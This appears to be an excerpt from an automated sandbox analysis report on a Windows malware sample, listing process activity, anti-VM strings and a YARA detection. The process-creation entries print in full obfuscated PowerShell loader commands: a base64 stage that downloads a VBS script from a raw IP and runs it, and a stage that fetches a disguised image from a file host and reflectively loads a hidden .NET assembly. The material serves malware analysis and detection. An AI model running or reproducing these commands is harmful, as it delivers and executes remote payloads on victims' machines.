Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7370	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2228	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3021	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6751	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5608	Thread sleep count: 7370 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5544	Thread sleep count: 2228 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1700	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6964	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000003.00000002.1829980353.0000000004858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: wscript.exe, 00000006.00000003.1821905362.0000000004B06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000003.00000002.1835792853.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWy/g9
Source: powershell.exe, 00000003.00000002.1829980353.0000000004858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1835596008.0000000007D59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: powershell.exe, 00000007.00000002.2351475506.000000000D971000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 4'fqemU
Source: mshta.exe, 00000000.00000002.1728795101.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\j
Source: powershell.exe, 00000003.00000002.1835792853.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000006.00000003.1821905362.0000000004B06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000003.00000002.1829980353.0000000004858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000007.00000002.2154082087.00000000078D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_2492.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2492, type: MEMORYSTR

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4B4.tmp" "c:\Users\user\AppData\Local\Temp\e0waei52\CSC9C05B393FD2448C976B42B57429CCF7.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() \| ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdh3ttj1vkqztsagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagieferc1uexbficagicagicagicagicagicagicagicagicagicagicagic1nrw1crxjkruzjtkluau9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24ilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagiepazfbhrk1erxlmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbcuhngc2jtusxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagcnosdwludcagicagicagicagicagicagicagicagicagicagicagicblwwhzleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbormjdzck7jyagicagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicagicaivfzbavrzehaiicagicagicagicagicagicagicagicagicagicagicagic1uqw1lc3bby0ugicagicagicagicagicagicagicagicagicagicagicagdxpgvhjgrwwgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakohdnmnvwrdnnojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vntcumti5lju1ljiyns8ymjuvzwnvbm9tawn0agluz3nhcmvnb2luz2fyb3vuzhdpdghodxniyw5kd2l0agdvb2ruzxdzz3jlyxrmb3jldmvyewjvzhlnaxzlbi50suyilcikzu5wokfquerbvefczwnvbm9tawn0agluz3nhcmvnb2luz2fyb3vuzhdpdghodxniyw5kd2l0agdvb2ruzs52ynmildasmck7u3rbclqtu0xlrvaomyk7aw5wb0tfluvychjlu3njb24gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxly29ub21py3roaw5nc2fyzwdvaw5nyxjvdw5kd2l0agh1c2jhbmr3axroz29vzg5llnzicyi='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdh3ttj1vkqztsagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagieferc1uexbficagicagicagicagicagicagicagicagicagicagicagic1nrw1crxjkruzjtkluau9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24ilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagiepazfbhrk1erxlmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbcuhngc2jtusxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagcnosdwludcagicagicagicagicagicagicagicagicagicagicagicblwwhzleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbormjdzck7jyagicagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicagicaivfzbavrzehaiicagicagicagicagicagicagicagicagicagicagicagic1uqw1lc3bby0ugicagicagicagicagicagicagicagicagicagicagicagdxpgvhjgrwwgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakohdnmnvwrdnnojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vntcumti5lju1ljiyns8ymjuvzwnvbm9tawn0agluz3nhcmvnb2luz2fyb3vuzhdpdghodxniyw5kd2l0agdvb2ruzxdzz3jlyxrmb3jldmvyewjvzhlnaxzlbi50suyilcikzu5wokfquerbvefczwnvbm9tawn0agluz3nhcmvnb2luz2fyb3vuzhdpdghodxniyw5kd2l0agdvb2ruzs52ynmildasmck7u3rbclqtu0xlrvaomyk7aw5wb0tfluvychjlu3njb24gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxly29ub21py3roaw5nc2fyzwdvaw5nyxjvdw5kd2l0agh1c2jhbmr3axroz29vzg5llnzicyi='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = new-object system.net.webclient;$centralised = $orlage.downloaddata($antisiphonal);$slanshacks = [system.text.encoding]::utf8.getstring($centralised);$commends = '<<base64_start>>';$lemaitre = '<<base64_end>>';$ependymis = $slanshacks.indexof($commends);$transcolation = $slanshacks.indexof($lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.tochararray() \| foreach-object { $_ })[-1..-($dorsolumbar.length)];$carinately = [system.convert]::frombase64string($keltologist);$brite = [system.reflection.assembly]::load($carinately);$helygia = [dnlib.io.home].getmethod('vai');$helygia.invoke($null, @('0/qvvum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'caspol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { 